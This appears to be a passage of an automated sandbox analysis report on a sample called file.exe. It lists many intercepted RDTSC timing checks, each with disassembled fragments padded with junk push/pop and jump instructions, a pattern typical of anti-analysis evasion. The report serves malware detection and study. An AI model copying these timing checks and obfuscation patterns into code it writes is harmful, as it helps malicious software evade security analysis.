                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB5C3D second address: FB5C54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC2C8DD5EFEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB5C54 second address: FB5C58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB6482 second address: FB6486 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB6486 second address: FB648A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB648A second address: FB64AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FC2C8DD5EF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC2C8DD5F02h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB64AC second address: FB64B6 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC2C8B99096h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB64B6 second address: FB64BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB6776 second address: FB677C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB677C second address: FB6782 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB6ACE second address: FB6AF9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FC2C8B990A7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007FC2C8B99096h 0x00000013 jnp 00007FC2C8B99096h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB6AF9 second address: FB6AFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBB69C second address: FBB6A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jbe 00007FC2C8B99096h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBB6A8 second address: FBB6BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8DD5F02h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBB939 second address: FBB943 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FC2C8B99096h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBB943 second address: FBB96D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8DD5EFFh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jc 00007FC2C8DD5EF6h 0x00000015 jmp 00007FC2C8DD5EFBh 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBB96D second address: FBB98D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8B990A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBB98D second address: FBB995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBBC24 second address: FBBC28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBBC28 second address: FBBC32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FC2C8DD5EF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBC0A2 second address: FBC0A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBC0A8 second address: FBC0AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBC0AD second address: FBC0D0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FC2C8B9909Fh 0x00000008 jnp 00007FC2C8B99096h 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jg 00007FC2C8B99096h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBC210 second address: FBC22B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8DD5F02h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBC22B second address: FBC238 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBC238 second address: FBC23E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC11F5 second address: FC11FE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC11FE second address: FC121D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jmp 00007FC2C8DD5F06h 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCA0A2 second address: FCA0BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8B990A8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCA0BE second address: FCA0D0 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC2C8DD5EFAh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCA0D0 second address: FCA0DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FC2C8B99096h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCA0DC second address: FCA0EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007FC2C8DD5EF6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCA0EB second address: FCA0FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007FC2C8B99096h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e ja 00007FC2C8B99096h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCA0FF second address: FCA103 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC8A89 second address: FC8A8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC97D4 second address: FC97DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FC2C8DD5EF6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC97DF second address: FC97E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC97E4 second address: FC9802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2C8DD5F08h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCF75A second address: FCF769 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 ja 00007FC2C8B99096h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD3599 second address: FD359D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD3741 second address: FD3755 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8B990A0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDF1D5 second address: FDF1DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDEEB4 second address: FDEECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2C8B9909Dh 0x00000009 popad 0x0000000a js 00007FC2C8B9909Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE5F1C second address: FE5F20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE5F20 second address: FE5F2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 push edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE5934 second address: FE5950 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8DD5F08h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE5950 second address: FE595E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE595E second address: FE5968 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE5AE6 second address: FE5AEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE5AEA second address: FE5B03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2C8DD5EFDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE5B03 second address: FE5B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE5B07 second address: FE5B0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEABBC second address: FEABC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEABC0 second address: FEABC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0EA36 second address: F0EA3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0EA3C second address: F0EA60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8DD5F04h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jnl 00007FC2C8DD5EF6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0EA60 second address: F0EA66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0EA66 second address: F0EA6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEC528 second address: FEC53F instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC2C8B990A2h 0x00000008 jnc 00007FC2C8B99096h 0x0000000e jg 00007FC2C8B99096h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEC53F second address: FEC545 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEC383 second address: FEC389 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEC389 second address: FEC38D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF10EC second address: FF1105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FC2C8B99096h 0x0000000a jmp 00007FC2C8B9909Eh 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF1105 second address: FF1115 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007FC2C8DD5EF6h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFE371 second address: FFE37A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFE37A second address: FFE3B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2C8DD5F08h 0x00000009 jmp 00007FC2C8DD5F04h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 jnp 00007FC2C8DD5EF6h 0x0000001b pop eax 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFE3B8 second address: FFE3BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFE3BE second address: FFE3C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFE516 second address: FFE51A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFE51A second address: FFE520 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFE841 second address: FFE85F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2C8B990A8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFE85F second address: FFE867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFE867 second address: FFE86D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFE86D second address: FFE888 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2C8DD5F06h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFEB5A second address: FFEB88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FC2C8B990A6h 0x0000000b popad 0x0000000c jnl 00007FC2C8B990A1h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFEB88 second address: FFEB9A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC2C8DD5EF8h 0x00000008 push edx 0x00000009 pop edx 0x0000000a jbe 00007FC2C8DD5EFCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10036FB second address: 100371E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b jns 00007FC2C8B99096h 0x00000011 popad 0x00000012 jmp 00007FC2C8B990A1h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100371E second address: 100372F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC2C8DD5EFBh 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100548A second address: 10054A0 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC2C8B99096h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jno 00007FC2C8B9909Ch 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10054A0 second address: 10054AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101188E second address: 10118A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2C8B9909Ah 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007FC2C8B99096h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10204EA second address: 10204F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10204F0 second address: 102050F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8B990A8h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102345F second address: 1023467 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1022FA7 second address: 1022FC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8B990A2h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jg 00007FC2C8B990A2h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1022FC7 second address: 1022FF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FC2C8DD5EF6h 0x0000000a jg 00007FC2C8DD5F24h 0x00000010 push ebx 0x00000011 jmp 00007FC2C8DD5F06h 0x00000016 pop ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b jne 00007FC2C8DD5EF6h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102313B second address: 102313F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102313F second address: 102314A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102314A second address: 1023152 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1023152 second address: 1023157 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1023157 second address: 102316A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8B9909Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1033176 second address: 10331BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007FC2C8DD5EF6h 0x0000000c popad 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC2C8DD5F08h 0x00000015 push ecx 0x00000016 jmp 00007FC2C8DD5F09h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10331BA second address: 10331BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10331BF second address: 10331CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnc 00007FC2C8DD5EF6h 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1032124 second address: 103212F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FC2C8B99096h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1032552 second address: 103255F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103287E second address: 1032884 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1032884 second address: 1032894 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC2C8DD5EF6h 0x00000008 jbe 00007FC2C8DD5EF6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1032894 second address: 1032899 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1032B79 second address: 1032B97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8DD5F07h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1032CF0 second address: 1032CF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1032E6A second address: 1032E70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
